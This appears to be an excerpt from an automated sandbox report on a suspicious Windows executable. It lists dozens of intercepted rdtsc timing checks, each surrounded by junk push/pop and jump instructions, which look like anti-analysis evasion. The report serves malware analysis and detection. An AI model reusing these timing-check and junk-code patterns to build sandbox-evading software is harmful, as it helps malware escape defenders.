                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1102410 second address: 1102416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1102416 second address: 1102429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DBFh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1102429 second address: 110246A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FF30CF3CAFCh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007FF30CF3CAF4h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push esi 0x00000020 pop esi 0x00000021 pop edi 0x00000022 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 110827E second address: 1108283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1108283 second address: 1108289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1108289 second address: 11082A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF30D194DB6h 0x0000000a jp 00007FF30D194DB6h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jno 00007FF30D194DB6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11082A9 second address: 11082AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11082AE second address: 11082B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11082B5 second address: 11082BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11082BE second address: 11082C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11083CD second address: 11083DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FF30CF3CAE6h 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11083DF second address: 11083E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11083E5 second address: 11083FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30CF3CAF4h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11083FD second address: 1108403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1108A7D second address: 1108A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1108A8B second address: 1108AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1108AA0 second address: 1108AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FF30CF3CAF0h 0x0000000d popad 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11092F8 second address: 110930F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DC3h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1109667 second address: 110966D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 110966D second address: 1109675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 106AF99 second address: 106AF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 106AF9D second address: 106AFBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FF30D194DBFh 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FF30D194DB6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1112671 second address: 111267B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF30CF3CAE6h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11127F2 second address: 1112800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF30D194DBEh 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1112BE2 second address: 1112BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1112BE6 second address: 1112BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1112BEC second address: 1112C0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007FF30CF3CAE6h 0x00000014 pop eax 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1112F5A second address: 1112F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11131C7 second address: 11131F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f ja 00007FF30CF3CAF6h 0x00000015 push edi 0x00000016 jp 00007FF30CF3CAE6h 0x0000001c pop edi 0x0000001d popad 0x0000001e pushad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111BF1A second address: 111BF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC4h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111BF38 second address: 111BF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push edx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111A06D second address: 111A080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF30D194DBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111A49A second address: 111A4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF1h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111A4B3 second address: 111A4C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111A62F second address: 111A635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111ABE4 second address: 111AC04 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FF30D194DB8h 0x00000012 js 00007FF30D194DBCh 0x00000018 jg 00007FF30D194DB6h 0x0000001e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111AC04 second address: 111AC10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FF30CF3CAE6h 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111AC10 second address: 111AC36 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF30D194DB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF30D194DC7h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111AF44 second address: 111AF67 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF30CF3CAF3h 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111AF67 second address: 111AF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1119C0C second address: 1119C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1119C12 second address: 1119C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1119C18 second address: 1119C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FF30CF3CAEEh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007FF30CF3CAE6h 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1119C35 second address: 1119C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1119C39 second address: 1119C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11221A6 second address: 11221AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11221AA second address: 11221CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF30CF3CAEAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF30CF3CAF1h 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 112233E second address: 112235C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF30D194DC7h 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 112E212 second address: 112E226 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FF30CF3CAEBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 112E226 second address: 112E24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF30D194DB6h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jno 00007FF30D194DB6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF30D194DBFh 0x0000001e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1142DB0 second address: 1142DB6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1142DB6 second address: 1142DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1145529 second address: 114552D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114552D second address: 1145531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1145531 second address: 1145541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FF30CF3CAE6h 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C312 second address: 114C32E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C32E second address: 114C334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C334 second address: 114C33F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF30D194DB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C33F second address: 114C34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C34E second address: 114C366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a jo 00007FF30D194DB6h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C4B5 second address: 114C4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C4BB second address: 114C4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C4C0 second address: 114C4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30CF3CAEDh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1150CF9 second address: 1150D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FF30D194DB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1156634 second address: 115663A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 115663A second address: 1156646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1156646 second address: 115664C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 115664C second address: 1156684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF30D194DC1h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF30D194DC6h 0x0000000f popad 0x00000010 pushad 0x00000011 ja 00007FF30D194DB6h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1156684 second address: 1156691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1156691 second address: 115669A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 115669A second address: 11566A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11566A0 second address: 11566A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11566A4 second address: 11566A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11566A8 second address: 11566BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FF30D194DB6h 0x00000010 jc 00007FF30D194DB6h 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11566BE second address: 11566C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11564D6 second address: 11564EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC0h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11564EA second address: 1156501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1156501 second address: 1156505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 115DBD4 second address: 115DBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF30CF3CAE6h 0x0000000a pop ecx 0x0000000b jmp 00007FF30CF3CAEFh 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 116F174 second address: 116F178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11720E5 second address: 1172109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF30CF3CAF7h 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1185743 second address: 118574B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 118574B second address: 1185759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jl 00007FF30CF3CAE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11858EE second address: 118591D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF30D194DC1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF30D194DC5h 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 118591D second address: 1185923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1185D4F second address: 1185D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FF30D194DBCh 0x0000000e jmp 00007FF30D194DBDh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1185D75 second address: 1185D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 118603F second address: 1186043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1186043 second address: 1186049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1186186 second address: 11861AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF30D194DC1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF30D194DBDh 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11893B8 second address: 11893BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
